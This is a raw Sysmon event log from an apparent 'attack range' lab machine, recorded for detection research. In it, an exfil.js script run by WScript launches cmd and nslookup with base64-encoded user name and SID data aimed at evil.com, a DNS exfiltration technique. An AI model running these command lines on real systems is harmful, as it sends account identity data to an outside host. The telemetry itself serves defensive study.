14:21:30.980{2E1864BB-18E0-629A-6742-000000005F02}39766244C:\Windows\System32\WScript.exe{2E1864BB-18EA-629A-8743-000000005F02}7072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.990{2E1864BB-18EA-629A-8743-000000005F02}7072C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnrgrs.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.980{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlprneu.tmpMD5=20783302D7601A2AA375A824723F16E5,SHA256=71E896EDC683926A4A0C6EDE66358751D292E4E8C82F0E9349EA1FBAA2ABF001,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000208701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.600{00000000-0000-0000-0000-000000000000}7084<unknown process>-udptruefalse127.0.0.1-50614-false127.0.0.1-53domain 354300x8000000000000000208700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.134{00000000-0000-0000-0000-000000000000}2900<unknown process>-udpfalsefalse127.0.0.1-50604-false127.0.0.1-53domain 354300x8000000000000000208699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.133{00000000-0000-0000-0000-000000000000}2900<unknown process>-udpfalsefalse127.0.0.1-50603-false127.0.0.1-53domain 354300x8000000000000000208698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.070{00000000-0000-0000-0000-000000000000}6932<unknown process>-udptruefalse127.0.0.1-50602-false127.0.0.1-53domain 354300x8000000000000000208697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.070{00000000-0000-0000-0000-000000000000}6932<unknown process>-udpfalsefalse127.0.0.1-50600-false127.0.0.1-53domain 10341000x8000000000000000208696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.942{2E1864BB-18EA-629A-8543-000000005F02}46325740C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-8643-000000005F02}2628C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.942{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.942{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.942{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.942{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-8643-000000005F02}2628C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.942{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.942{2E1864BB-18EA-629A-8443-000000005F02}47844248C:\Windows\system32\cmd.exe{2E1864BB-18EA-629A-8643-000000005F02}2628C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.953{2E1864BB-18EA-629A-8643-000000005F02}2628C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EA-629A-8443-000000005F02}4784C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlprneu.tmp 2>&1 10341000x8000000000000000208688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.927{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-8543-000000005F02}4632C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.927{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-8543-000000005F02}4632C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.927{2E1864BB-18EA-629A-8543-000000005F02}46325740C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-8443-000000005F02}4784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.911{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-8543-000000005F02}4632C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.911{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.911{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.911{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.911{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.911{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-8443-000000005F02}4784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.911{2E1864BB-18E0-629A-6742-000000005F02}39762516C:\Windows\System32\WScript.exe{2E1864BB-18EA-629A-8443-000000005F02}4784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.912{2E1864BB-18EA-629A-8443-000000005F02}4784C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlprneu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.895{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nluceisd.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.877{2E1864BB-18EA-629A-8243-000000005F02}61084828C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-8343-000000005F02}1352C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.858{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.858{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-8343-000000005F02}1352C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.858{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.858{2E1864BB-18EA-629A-8143-000000005F02}25124808C:\Windows\system32\cmd.exe{2E1864BB-18EA-629A-8343-000000005F02}1352C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.858{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.858{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 